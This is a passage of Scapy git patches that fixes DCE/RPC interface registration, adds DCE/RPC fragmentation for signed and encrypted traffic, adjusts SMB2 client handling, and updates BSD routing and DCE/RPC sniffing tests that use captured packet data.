'172.24.234.200', 'de0', '172.24.234.200', 1) +] + = OpenBSD 7.5 amd64 - read_routes6() ~ mock_read_routes_bsd little_endian_only @@ -3059,6 +3080,34 @@ assert routes == [ ('ff02:3::', 32, 'fe80:3::1', 'lo0', ['fe80:3::1'], 1) ] += OpenBSD 7.6 GENERIC#531 i386 - read_routes6() +~ mock_read_routes_bsd little_endian_only + +import zlib + +_PFROUTE_DATA = zlib.decompress(bytes.fromhex('789ced96310e824010450717136269456141ac2cedac2dacaced3d808947905b781d8ee21138814836226477083b0ae89aff0a9a1966e7e5872c394dc32329228a68533ef71169ae87803a49bb5b16b1b816346b4583aa21992b8acb954fe7b5786efef20db4ef8e96ba68faaeb80929d1ac4dc6e16ca96fe5dc8fef58f9d6397d37df617d93896caf86afd5e087ef45b497ffbe37d15eb56f6e35f8e16be7f4cff9de995e27dfcc6ef0c23793ed35bc6f75ff26ba3840beca3cdba5f6c9fdcbcd1d2bdf8219e7f6fdda0dfde41b6adfedf39e347d59fb949dcb9e5dfaaab65a57bee67b5ee4fbf6ff86dde045be93dfc81700000000000000000000009f7900a834b765')) + + +with BSDLoader(OPENBSD=True, sysctldata=_PFROUTE_DATA, AF_INET6=24, IS_64BITS=False) as pfroute: + routes = pfroute.read_routes6() + +assert routes == [ + ('::', 96, '::1', 'lo0', ['::1'], 1), + ('::1', 128, '::1', 'lo0', ['::1'], 1), + ('::ffff:0.0.0.0', 96, '::1', 'lo0', ['::1'], 1), + ('2002::', 24, '::1', 'lo0', ['::1'], 1), + ('2002:7f00::', 24, '::1', 'lo0', ['::1'], 1), + ('2002:e000::', 20, '::1', 'lo0', ['::1'], 1), + ('2002:ff00::', 24, '::1', 'lo0', ['::1'], 1), + ('fe80::', 10, '::1', 'lo0', ['::1'], 1), + ('fec0::', 10, '::1', 'lo0', ['::1'], 1), + ('fe80:3::1', 128, 'fe80:3::1', 'lo0', ['fe80:3::1'], 1), + ('ff01::', 16, '::1', 'lo0', ['::1'], 1), + ('ff01:3::', 32, 'fe80:3::1', 'lo0', ['fe80:3::1'], 1), + ('ff02::', 16, '::1', 'lo0', ['::1'], 1), + ('ff02:3::', 32, 'fe80:3::1', 'lo0', ['fe80:3::1'], 1) +] + = FreeBSD 14.1 amd64 - read_routes() ~ mock_read_routes_bsd little_endian_only From 1bdc2105c813d48ff96b8141ffd44128a8fdc551 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sun, 23 Feb 2025 15:04:00 +0100 Subject: [PATCH 1437/1632] DceRpc fix register_dcerpc_interface duplication (#4672) --- scapy/layers/dcerpc.py | 28 ++++++++++++---------------- 1 file changed, 12 insertions(+), 16 deletions(-) diff --git a/scapy/layers/dcerpc.py b/scapy/layers/dcerpc.py index 346de69bab2..5c9f150a7e6 100644 --- a/scapy/layers/dcerpc.py +++ b/scapy/layers/dcerpc.py @@ -1205,15 +1205,9 @@ def register_dcerpc_interface(name, uuid, version, opnums): # Interface is already registered. interface = DCE_RPC_INTERFACES[(uuid, if_version)] if interface.name == name: - if interface.if_version == if_version and set(opnums) - set( - interface.opnums - ): + if set(opnums) - set(interface.opnums): # Interface is an extension of a previous interface interface.opnums.update(opnums) - return - elif interface.if_version != if_version: - # Interface has a different version - pass else: log_runtime.warning( "This interface is already registered: %s. Skip" % interface @@ -1223,15 +1217,17 @@ def register_dcerpc_interface(name, uuid, version, opnums): raise ValueError( "An interface with the same UUID is already registered: %s" % interface ) - DCE_RPC_INTERFACES_NAMES[uuid] = name - DCE_RPC_INTERFACES_NAMES_rev[name.lower()] = uuid - DCE_RPC_INTERFACES[(uuid, if_version)] = DceRpcInterface( - name, - uuid, - version_tuple, - if_version, - opnums, - ) + else: + # New interface + DCE_RPC_INTERFACES_NAMES[uuid] = name + DCE_RPC_INTERFACES_NAMES_rev[name.lower()] = uuid + DCE_RPC_INTERFACES[(uuid, if_version)] = DceRpcInterface( + name, + uuid, + version_tuple, + if_version, + opnums, + ) # bind for build for opnum, operations in opnums.items(): bind_top_down(DceRpc5Request, operations.request, opnum=opnum) From 727551631e37a6835e4072b5e591b40a5dcb0662 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sun, 23 Feb 2025 22:16:17 +0100 Subject: [PATCH 1438/1632] Allow to set IP manually in Automaton.spawn() (#4673) --- scapy/automaton.py | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/scapy/automaton.py b/scapy/automaton.py index cf43472ad18..b1f37bef510 100644 --- a/scapy/automaton.py +++ b/scapy/automaton.py @@ -968,6 +968,7 @@ def parse_args(self, debug=0, store=0, **kargs): def spawn(cls, port: int, iface: Optional[_GlobInterfaceType] = None, + local_ip: Optional[str] = None, bg: bool = False, **kwargs: Any) -> Optional[socket.socket]: """ @@ -986,7 +987,8 @@ def spawn(cls, from scapy.arch import get_if_addr # create server sock and bind it ssock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - local_ip = get_if_addr(iface or conf.iface) + if local_ip is None: + local_ip = get_if_addr(iface or conf.iface) try: ssock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) except OSError: From d61ab7bfd5d4f280dbce14771dbb1f8676fb2edd Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Wed, 26 Feb 2025 23:46:11 +0100 Subject: [PATCH 1439/1632] DCE/RPC: various bug fixes in PKT_PRIVACY mode / client fragmentation (#4664) * DCE/RPC: defragment should happen after integrity check/decryption * DCE/RPC: fragment client request * Fix vt_trailer decryption + better error logging --- scapy/layers/dcerpc.py | 365 +++++++++++++++++++------------ scapy/layers/msrpce/rpcclient.py | 1 + scapy/layers/smb2.py | 12 +- scapy/layers/smbclient.py | 33 +-- test/scapy/layers/dcerpc.uts | 17 +- 5 files changed, 267 insertions(+), 161 deletions(-) diff --git a/scapy/layers/dcerpc.py b/scapy/layers/dcerpc.py index 5c9f150a7e6..215281c2946 100644 --- a/scapy/layers/dcerpc.py +++ b/scapy/layers/dcerpc.py @@ -2614,31 +2614,59 @@ def _up_pkt(self, pkt): # Since the connection-oriented transport guarantees sequentiality, the receiver # will always receive the fragments in order. - def _defragment(self, pkt): + def _defragment(self, pkt, body=None): """ Function to defragment DCE/RPC packets. """ uid = pkt.call_id if pkt.pfc_flags.PFC_FIRST_FRAG and pkt.pfc_flags.PFC_LAST_FRAG: # Not fragmented - return pkt + return body if pkt.pfc_flags.PFC_FIRST_FRAG or uid in self.frags: # Packet is fragmented - self.frags[uid] += pkt[DceRpc5].payload.payload.original + if body is None: + body = pkt[DceRpc5].payload.payload.original + self.frags[uid] += body if pkt.pfc_flags.PFC_LAST_FRAG: - pkt[DceRpc5].payload.remove_payload() - pkt[DceRpc5].payload /= self.frags[uid] - return pkt + return self.frags[uid] else: # Not fragmented - return pkt + return body - def _fragment(self, pkt): + # C706 sect 12.5.2.15 - PDU Body Length + # "The maximum PDU body size is 65528 bytes." + MAX_PDU_BODY_SIZE = 4176 + + def _fragment(self, pkt, body): """ Function to fragment DCE/RPC packets. """ - # unimplemented - pass + if len(body) > self.MAX_PDU_BODY_SIZE: + # Clear any PFC_*_FRAG flag + pkt.pfc_flags &= 0xFC + + # Iterate through fragments + cur = None + while body: + # Create a fragment + pkt_frag = pkt.copy() + + if cur is None: + # It's the first one + pkt_frag.pfc_flags += "PFC_FIRST_FRAG" + + # Split + cur, body = ( + body[: self.MAX_PDU_BODY_SIZE], + body[self.MAX_PDU_BODY_SIZE :], + ) + + if not body: + # It's the last one + pkt_frag.pfc_flags += "PFC_LAST_FRAG" + yield pkt_frag, cur + else: + yield pkt, body # [MS-RPCE] sect 3.3.1.5.2.2 @@ -2656,12 +2684,6 @@ def _fragment(self, pkt): # Similarly the signature output SHOULD be ignored. def in_pkt(self, pkt): - # Defragment - pkt = self._defragment(pkt) - if not pkt: - return - # Get opnum and options - opnum, opts = self._up_pkt(pkt) # Check for encrypted payloads body = None if conf.raw_layer in pkt.payload: @@ -2779,10 +2801,18 @@ def in_pkt(self, pkt): if pkt.auth_padding: padlen = len(pkt.auth_padding) body, pkt.auth_padding = body[:-padlen], body[-padlen:] - # Put back vt_trailer into the header - if pkt.vt_trailer: - vtlen = len(pkt.vt_trailer) - body, pkt.vt_trailer = body[:-vtlen], body[-vtlen:] + # Put back vt_trailer into the header, if present. + if _SECTRAILER_MAGIC in body: + body, pkt.vt_trailer = pkt.get_field("vt_trailer").getfield( + pkt, body + ) + # If it's a request / response, could be fragmented + if isinstance(pkt.payload, (DceRpc5Request, DceRpc5Response)) and body: + body = self._defragment(pkt, body) + if not body: + return + # Get opnum and options + opnum, opts = self._up_pkt(pkt) # Try to parse the payload if opnum is not None and self.rpc_bind_interface: # use opnum to parse the payload @@ -2798,9 +2828,28 @@ def in_pkt(self, pkt): return pkt if body: # Dissect payload using class - payload = cls(body, ndr64=self.ndr64, ndrendian=self.ndrendian, **opts) + try: + payload = cls( + body, ndr64=self.ndr64, ndrendian=self.ndrendian, **opts + ) + except Exception: + if conf.debug_dissector: + log_runtime.error("%s dissector failed", cls.__name__) + if cls is not None: + raise + payload = conf.raw_layer(body, _internal=1) pkt.payload[conf.raw_layer].underlayer.remove_payload() + if conf.padding_layer in payload: + # Most likely, dissection failed. + log_runtime.warning( + "Padding detected when dissecting %s. Looks wrong." % cls + ) + pad = payload[conf.padding_layer] + pad.underlayer.payload = conf.raw_layer(load=pad.load) pkt /= payload + # If a request was encrypted, we need to re-register it once re-parsed. + if not is_response and self.auth_level == RPC_C_AUTHN_LEVEL.PKT_PRIVACY: + self._up_pkt(pkt) elif not cls.fields_desc: # Request class has no payload pkt /= cls(ndr64=self.ndr64, ndrendian=self.ndrendian, **opts) @@ -2810,134 +2859,159 @@ def in_pkt(self, pkt): def out_pkt(self, pkt): assert DceRpc5 in pkt + # Register opnum and options self._up_pkt(pkt) - if pkt.auth_verifier is not None: - # Verifier already set - return [pkt] - if self.sspcontext and isinstance( - pkt.payload, (DceRpc5Request, DceRpc5Response) - ): + + # If it's a request / response, we can frag it + if isinstance(pkt.payload, (DceRpc5Request, DceRpc5Response)): + # The list of packet responses + pkts = [] + # Take the body payload, and eventually split it body = bytes(pkt.payload.payload) - signature = None - if self.auth_level in ( - RPC_C_AUTHN_LEVEL.PKT_INTEGRITY, - RPC_C_AUTHN_LEVEL.PKT_PRIVACY, - ): - # Account for padding when computing checksum/encryption - if pkt.auth_padding is None: - padlen = (-len(body)) % _COMMON_AUTH_PAD # authdata padding - pkt.auth_padding = b"\x00" * padlen - else: - padlen = len(pkt.auth_padding) - # Remember that vt_trailer is included in the PDU - if pkt.vt_trailer: - body += bytes(pkt.vt_trailer) - # Remember that padding IS SIGNED & ENCRYPTED - body += pkt.auth_padding - # Add the auth_verifier - pkt.auth_verifier = CommonAuthVerifier( - auth_type=self.ssp.auth_type, - auth_level=self.auth_level, - auth_context_id=self.auth_context_id, - auth_pad_length=padlen, - # Note: auth_value should have the correct length because when - # using PFC_SUPPORT_HEADER_SIGN, auth_len (and frag_len) is - # included in the token.. but this creates a dependency loop as - # you'd need to know the token length to compute the token. - # Windows solves this by setting the 'Maximum Signature Length' - # (or something similar) beforehand, instead of the real length. - # See `gensec_sig_size` in samba. - auth_value=b"\x00" - * self.ssp.MaximumSignatureLength(self.sspcontext), - ) - # Build pdu_header and sec_trailer - pdu_header = pkt.copy() - pdu_header.auth_len = len(pdu_header.auth_verifier) - 8 - pdu_header.frag_len = len(pdu_header) - sec_trailer = pdu_header.auth_verifier - # sec_trailer: include the sec_trailer but not the Authentication token - authval_len = len(sec_trailer.auth_value) - # sec_trailer.auth_value = None - # Discard everything out of the header - pdu_header.auth_padding = None - pdu_header.auth_verifier = None - pdu_header.payload.payload = NoPayload() - pdu_header.vt_trailer = None - signature = None - # [MS-RPCE] sect 2.2.2.12 - if self.auth_level == RPC_C_AUTHN_LEVEL.PKT_PRIVACY: - _msgs, signature = self.ssp.GSS_WrapEx( - self.sspcontext, - [ - # "PDU header" - SSP.WRAP_MSG( - conf_req_flag=False, - sign=self.header_sign, - data=bytes(pdu_header), - ), - # "PDU body" - SSP.WRAP_MSG( - conf_req_flag=True, - sign=True, - data=body, - ), - # "sec_trailer" - SSP.WRAP_MSG( - conf_req_flag=False, - sign=self.header_sign, - data=bytes(sec_trailer)[:-authval_len], - ), - ], - ) - s = _msgs[1].data # PDU body - elif self.auth_level == RPC_C_AUTHN_LEVEL.PKT_INTEGRITY: - signature = self.ssp.GSS_GetMICEx( - self.sspcontext, - [ - # "PDU header" - SSP.MIC_MSG( - sign=self.header_sign, - data=bytes(pdu_header), - ), - # "PDU body" - SSP.MIC_MSG( - sign=True, - data=body, - ), - # "sec_trailer" - SSP.MIC_MSG( - sign=self.header_sign, - data=bytes(sec_trailer)[:-authval_len], - ), - ], - pkt.auth_verifier.auth_value, - ) - s = body - else: - raise ValueError("Impossible") - # Put padding back in the header - if padlen: - s, pkt.auth_padding = s[:-padlen], s[-padlen:] - # Put back vt_trailer into the header - if pkt.vt_trailer: - vtlen = len(pkt.vt_trailer) - s, pkt.vt_trailer = s[:-vtlen], s[-vtlen:] - else: - s = body - # now inject the encrypted payload into the packet - pkt.payload.payload = conf.raw_layer(load=s) - # and the auth_value - if signature: - pkt.auth_verifier.auth_value = signature - else: - pkt.auth_verifier = None - return [pkt] + for pkt, body in self._fragment(pkt, body): + if pkt.auth_verifier is not None: + # Verifier already set + pkts.append(pkt) + continue + + # Sign / Encrypt + if self.sspcontext: + signature = None + if self.auth_level in ( + RPC_C_AUTHN_LEVEL.PKT_INTEGRITY, + RPC_C_AUTHN_LEVEL.PKT_PRIVACY, + ): + # Account for padding when computing checksum/encryption + if pkt.auth_padding is None: + padlen = (-len(body)) % _COMMON_AUTH_PAD # authdata padding + pkt.auth_padding = b"\x00" * padlen + else: + padlen = len(pkt.auth_padding) + # Remember that vt_trailer is included in the PDU + if pkt.vt_trailer: + body += bytes(pkt.vt_trailer) + # Remember that padding IS SIGNED & ENCRYPTED + body += pkt.auth_padding + # Add the auth_verifier + pkt.auth_verifier = CommonAuthVerifier( + auth_type=self.ssp.auth_type, + auth_level=self.auth_level, + auth_context_id=self.auth_context_id, + auth_pad_length=padlen, + # Note: auth_value should have the correct length because + # when using PFC_SUPPORT_HEADER_SIGN, auth_len + # (and frag_len) is included in the token.. but this + # creates a dependency loop as you'd need to know the token + # length to compute the token. Windows solves this by + # setting the 'Maximum Signature Length' (or something + # similar) beforehand, instead of the real length. + # See `gensec_sig_size` in samba. + auth_value=b"\x00" + * self.ssp.MaximumSignatureLength(self.sspcontext), + ) + # Build pdu_header and sec_trailer + pdu_header = pkt.copy() + pdu_header.auth_len = len(pdu_header.auth_verifier) - 8 + pdu_header.frag_len = len(pdu_header) + sec_trailer = pdu_header.auth_verifier + # sec_trailer: include the sec_trailer but not the + # Authentication token + authval_len = len(sec_trailer.auth_value) + # sec_trailer.auth_value = None + # Discard everything out of the header + pdu_header.auth_padding = None + pdu_header.auth_verifier = None + pdu_header.payload.payload = NoPayload() + pdu_header.vt_trailer = None + signature = None + # [MS-RPCE] sect 2.2.2.12 + if self.auth_level == RPC_C_AUTHN_LEVEL.PKT_PRIVACY: + _msgs, signature = self.ssp.GSS_WrapEx( + self.sspcontext, + [ + # "PDU header" + SSP.WRAP_MSG( + conf_req_flag=False, + sign=self.header_sign, + data=bytes(pdu_header), + ), + # "PDU body" + SSP.WRAP_MSG( + conf_req_flag=True, + sign=True, + data=body, + ), + # "sec_trailer" + SSP.WRAP_MSG( + conf_req_flag=False, + sign=self.header_sign, + data=bytes(sec_trailer)[:-authval_len], + ), + ], + ) + s = _msgs[1].data # PDU body + elif self.auth_level == RPC_C_AUTHN_LEVEL.PKT_INTEGRITY: + signature = self.ssp.GSS_GetMICEx( + self.sspcontext, + [ + # "PDU header" + SSP.MIC_MSG( + sign=self.header_sign, + data=bytes(pdu_header), + ), + # "PDU body" + SSP.MIC_MSG( + sign=True, + data=body, + ), + # "sec_trailer" + SSP.MIC_MSG( + sign=self.header_sign, + data=bytes(sec_trailer)[:-authval_len], + ), + ], + pkt.auth_verifier.auth_value, + ) + s = body + else: + raise ValueError("Impossible") + # Put padding back in the header + if padlen: + s, pkt.auth_padding = s[:-padlen], s[-padlen:] + # Put back vt_trailer into the header + if pkt.vt_trailer: + vtlen = len(pkt.vt_trailer) + s, pkt.vt_trailer = s[:-vtlen], s[-vtlen:] + else: + s = body + + # now inject the encrypted payload into the packet + pkt.payload.payload = conf.raw_layer(load=s) + # and the auth_value + if signature: + pkt.auth_verifier.auth_value = signature + else: + pkt.auth_verifier = None + # Add to the list + pkts.append(pkt) + return pkts + else: + return [pkt] def process(self, pkt: Packet) -> Optional[Packet]: + """ + Used when DceRpcSession is used for passive sniffing. + """ pkt = super(DceRpcSession, self).process(pkt) if pkt is not None and DceRpc5 in pkt: - return self.in_pkt(pkt) + rpkt = self.in_pkt(pkt) + if rpkt is None: + # We are passively dissecting a fragmented packet. Return + # just the header showing that it was indeed, fragmented. + pkt[DceRpc5].payload.remove_payload() + return pkt + return rpkt return pkt @@ -2947,6 +3021,7 @@ class DceRpcSocket(StreamSocket): """ def __init__(self, *args, **kwargs): + self.transport = kwargs.pop("transport", None) self.session = DceRpcSession( ssp=kwargs.pop("ssp", None), auth_level=kwargs.pop("auth_level", None), @@ -2957,7 +3032,11 @@ def __init__(self, *args, **kwargs): def send(self, x, **kwargs): for pkt in self.session.out_pkt(x): - return super(DceRpcSocket, self).send(pkt, **kwargs) + if self.transport == DCERPC_Transport.NCACN_NP: + # In this case DceRpcSocket wraps a SMB_RPC_SOCKET, call it directly. + self.ins.send(pkt, **kwargs) + else: + super(DceRpcSocket, self).send(pkt, **kwargs) def recv(self, x=None): pkt = super(DceRpcSocket, self).recv(x) diff --git a/scapy/layers/msrpce/rpcclient.py b/scapy/layers/msrpce/rpcclient.py index 2d0f3410602..1c1e87ba23c 100644 --- a/scapy/layers/msrpce/rpcclient.py +++ b/scapy/layers/msrpce/rpcclient.py @@ -81,6 +81,7 @@ def __init__(self, transport, ndr64=False, ndrendian="little", verb=True, **kwar self.ssp = kwargs.pop("ssp", None) # type: SSP self.sspcontext = None self.dcesockargs = kwargs + self.dcesockargs["transport"] = self.transport @classmethod def from_smblink(cls, smbcli, smb_kwargs={}, **kwargs): diff --git a/scapy/layers/smb2.py b/scapy/layers/smb2.py index b545a421cff..d7c18f07a16 100644 --- a/scapy/layers/smb2.py +++ b/scapy/layers/smb2.py @@ -3633,7 +3633,7 @@ class SMB2_IOCTL_Request(_SMB2_Payload, _NTLMPayloadPacket): LEIntField("MaxInputResponse", 0), LEIntField("OutputBufferOffset", None), LEIntField("OutputLen", None), # Called OutputCount. - LEIntField("MaxOutputResponse", 1024), + LEIntField("MaxOutputResponse", 65535), FlagsField("Flags", 0, -32, {0x00000001: "SMB2_0_IOCTL_IS_FSCTL"}), LEIntField("Reserved2", 0), _NTLMPayloadField( @@ -4707,7 +4707,14 @@ def recv(self, x=None): and self.session.Dialect and self.session.SigningKey and self.session.SigningRequired + # [MS-SMB2] sect 3.2.5.1.3 Verifying the Signature + # "The client MUST skip the processing in this section if any of:" + # - [...] decryption in section 3.2.5.1.1.1 succeeds and not smbh._decrypted + # - MessageId is 0xFFFFFFFFFFFFFFFF + and smbh.MID != 0xFFFFFFFFFFFFFFFF + # - Status in the SMB2 header is STATUS_PENDING + and smbh.Status != 0x00000103 ): smbh.verify( self.session.Dialect, @@ -4746,6 +4753,9 @@ def __init__(self, *args, **kwargs): self.Dialect = 0x0202 # Updated by parent self.Credits = 0 self.IsGuest = False + self.MaxTransactionSize = 0 + self.MaxReadSize = 0 + self.MaxWriteSize = 0 # Crypto parameters. Go read [MS-SMB2] to understand the names. self.SigningRequired = True self.SupportsEncryption = False diff --git a/scapy/layers/smbclient.py b/scapy/layers/smbclient.py index e31e1a47f01..e543008bf4e 100644 --- a/scapy/layers/smbclient.py +++ b/scapy/layers/smbclient.py @@ -164,9 +164,6 @@ def __init__(self, sock, ssp=None, *args, **kwargs): self.NegotiateCapabilities = None self.GUID = RandUUID()._fix() self.SequenceWindow = (0, 0) # keep track of allowed MIDs - self.MaxTransactionSize = 0 - self.MaxReadSize = 0 - self.MaxWriteSize = 0 if ssp is None: # We got no SSP. Assuming the server allows anonymous ssp = SPNEGOSSP( @@ -412,9 +409,9 @@ def receive_negotiate_response(self, pkt): bytes(pkt[SMB2_Header]), # nego response ) # Process max sizes - self.MaxReadSize = pkt.MaxReadSize - self.MaxTransactionSize = pkt.MaxTransactionSize - self.MaxWriteSize = pkt.MaxWriteSize + self.session.MaxReadSize = pkt.MaxReadSize + self.session.MaxTransactionSize = pkt.MaxTransactionSize + self.session.MaxWriteSize = pkt.MaxWriteSize # Process SecurityMode if pkt.SecurityMode.SIGNING_REQUIRED: self.session.SigningRequired = True @@ -1028,8 +1025,12 @@ def send(self, x): """ Internal ObjectPipe function. """ - # Reminder: this class is an ObjectPipe, it's just a queue - if self.use_ioctl: + # Reminder: this class is an ObjectPipe, it's just a queue. + + # Detect if DCE/RPC is fragmented. Then we must use Read/Write + is_frag = x.pfc_flags & 3 != 3 + + if self.use_ioctl and not is_frag: # Use IOCTLRequest pkt = SMB2_IOCTL_Request( FileId=self.PipeFileId, @@ -1062,6 +1063,9 @@ def send(self, x): resp = self.ins.sr1(pkt, verbose=0) if SMB2_Write_Response not in resp: raise ValueError("Failed sending WriteResponse ! %s" % resp.NTStatus) + # If fragmented, only read if it's the last. + if is_frag and not x.pfc_flags.PFC_LAST_FRAG: + return # We send a Read Request afterwards resp = self.ins.sr1( SMB2_Read_Request( @@ -1071,9 +1075,9 @@ def send(self, x): ) if SMB2_Read_Response not in resp: raise ValueError("Failed reading ReadResponse ! %s" % resp.NTStatus) - data = bytes(resp.Data) - # Handle BUFFER_OVERFLOW (big DCE/RPC response) - while resp.NTStatus == "STATUS_BUFFER_OVERFLOW": + super(SMB_RPC_SOCKET, self).send(resp.Data) + # Handle fragmented response + while resp.Data[3] & 2 != 2: # PFC_LAST_FRAG not set # Retrieve DCE/RPC full size resp = self.ins.sr1( SMB2_Read_Request( @@ -1081,8 +1085,7 @@ def send(self, x): ), verbose=0, ) - data += resp.Data - super(SMB_RPC_SOCKET, self).send(data) + super(SMB_RPC_SOCKET, self).send(resp.Data) def close(self): SMB_SOCKET.close(self) @@ -1611,7 +1614,7 @@ def _get_file(self, file, fd): offset = 0 # Read the file while length: - lengthRead = min(self.sock.atmt.MaxReadSize, length) + lengthRead = min(self.smbsock.session.MaxReadSize, length) fd.write( self.smbsock.read_request(fileId, Length=lengthRead, Offset=offset) ) @@ -1638,7 +1641,7 @@ def _send_file(self, fname, fd): # Send the file offset = 0 while True: - data = fd.read(self.sock.atmt.MaxWriteSize) + data = fd.read(self.smbsock.session.MaxWriteSize) if not data: # end of file break diff --git a/test/scapy/layers/dcerpc.uts b/test/scapy/layers/dcerpc.uts index 6847a5cdc9a..5a3ac0c7147 100644 --- a/test/scapy/layers/dcerpc.uts +++ b/test/scapy/layers/dcerpc.uts @@ -561,6 +561,7 @@ assert pkt.value.Params[0].Type == 3 = [PASSIVE] Passive sniffing of DCE/RPC packets encrypted with SPNEGOSSP[NTLMSSP] from scapy.libs.rfc3961 import * +import uuid bind_bottom_up(TCP, DceRpc5, dport=49679) bind_bottom_up(TCP, DceRpc5, sport=49679) @@ -582,10 +583,19 @@ pkts.show() conf.dcerpc_session_enable = False -assert pkts[16].load == b'\x00\x00\x02\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x001\x009\x002\x00.\x001\x006\x008\x00.\x000\x00.\x001\x000\x000\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x8a\xe3\x13q\x02\xf46q\x02@(\x00\x81\xbbz6D\x98\xf15\xad2\x98\xf08\x00\x10\x03\x02\x00\x00\x00\x04]\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00+\x10H`\x02\x00\x00\x00' +# Packet 16 has an encrypted vt_trailer +assert pkts[16].vt_trailer.commands[0].Command == 2 +assert pkts[16].vt_trailer.commands[0].TransferSyntax == uuid.UUID('8a885d04-1ceb-11c9-9fe8-08002b104860') +assert pkts[16].load == b'\x00\x00\x02\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x001\x009\x002\x00.\x001\x006\x008\x00.\x000\x00.\x001\x000\x000\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00' + assert pkts[22].load == b'0\x00\x00\x00&\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00A\x00D\x00W\x00S\x00\x00\x00\xee`\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\xea\x00\x00\x00' assert pkts[23].load == b'\x00\x00\x00\x00\xad\xb3\xf5\xd1\x8eJ\xdeG\xa9\xa5\x85\xccvb\x8b\x970\x00\x00\x00\x03\x00\x00\x00\x1d\x83\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00' +# Packet 32 is defragmented and encrypted ! +assert pkts[32].auth_padding == b'\x00\x00\x00\x00\x00\x00\x00\x00' +assert len(pkts[32].load) == 33592 # reassembled +assert hashlib.sha256(pkts[32].load).digest() == b"\xc0\xb5\xde\x1c0\\\x02\x04\x1c\x7f\x05\xcc\xde\xd7\x01\xa5{\x917\xb4\xff\xc7\xa4\xd1\x89\xcd\x1cQ\xa1'3!" + = [PASSIVE] Passive sniffing of DCE/RPC packets encrypted with SPNEGOSSP[KerberosSSP] with AES from scapy.libs.rfc3961 import * @@ -609,7 +619,10 @@ pkts.show() conf.dcerpc_session_enable = False -assert pkts[15].load == b'\x00\x00\x02\x00\x00\x00\x00\x00\x1a M\xe2\xd6O\xd1\x11\xa3\xda\x00\x00\xf8u\xae\r\x00\x00\x02\x00\x00\x00\x00\x004\x00\x00\x00\x00\x00\x00\x004\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00$\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x8a\xe3\x13q\x02\xf46q\x02@(\x005BQ\xe3\x06K\xd1\x11\xab\x04\x00\xc0O\xc2\xdc\xd2\x04\x00\x00\x003\x05qq\xba\xbe7I\x83\x19\xb5\xdb\xef\x9c\xcc6\x01\x00\x00\x00' +# Packet 15 has an encrypted vt_trailer +assert pkts[15].vt_trailer.commands[0].Command == 2 +assert pkts[15].load == b'\x00\x00\x02\x00\x00\x00\x00\x00\x1a M\xe2\xd6O\xd1\x11\xa3\xda\x00\x00\xf8u\xae\r\x00\x00\x02\x00\x00\x00\x00\x004\x00\x00\x00\x00\x00\x00\x004\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00$\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' + assert pkts[21].load == b'\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00K\x00\x00\x00\x00\x00\x00\x00K\x00\x00\x00\x05\x00\x13\x00\r5BQ\xe3\x06K\xd1\x11\xab\x04\x00\xc0O\xc2\xdc\xd2\x04\x00\x02\x00\x00\x00\x13\x00\r\x04]\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00+\x10H`\x02\x00\x02\x00\x00\x00\x01\x00\x0b\x02\x00\x00\x00\x01\x00\x07\x02\x00\x00\x87\x01\x00\t\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00' assert pkts[22].load == b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00K\x00\x00\x00\x00\x00\x00\x00K\x00\x00\x00\x05\x00\x13\x00\r5BQ\xe3\x06K\xd1\x11\xab\x04\x00\xc0O\xc2\xdc\xd2\x04\x00\x02\x00\x00\x00\x13\x00\r\x04]\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00+\x10H`\x02\x00\x02\x00\x00\x00\x01\x00\x0b\x02\x00\x00\x00\x01\x00\x07\x02\x00\xc2\x03\x01\x00\t\x04\x00\xc0\xa8\x00d\x00\x00\x00\x00\x00' From 96d612b8b973dd05d5f3cbd2cf3848d31fdecfa5 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Thu, 27 Feb 2025 00:33:32 +0100 Subject: [PATCH 1440/1632] Fix compile_filter on *BSD with non-ether linktypes (#4670) * Fix compile_filter on *BSD with non-ether linktypes * Populate iface.type on the *BSDs * Fix IEEE802 ARP->DLT --- scapy/arch/bpf/pfroute.py | 3 +++ scapy/arch/common.py | 4 +--- scapy/data.py | 2 +- 3 files changed, 5 insertions(+), 4 deletions(-) diff --git 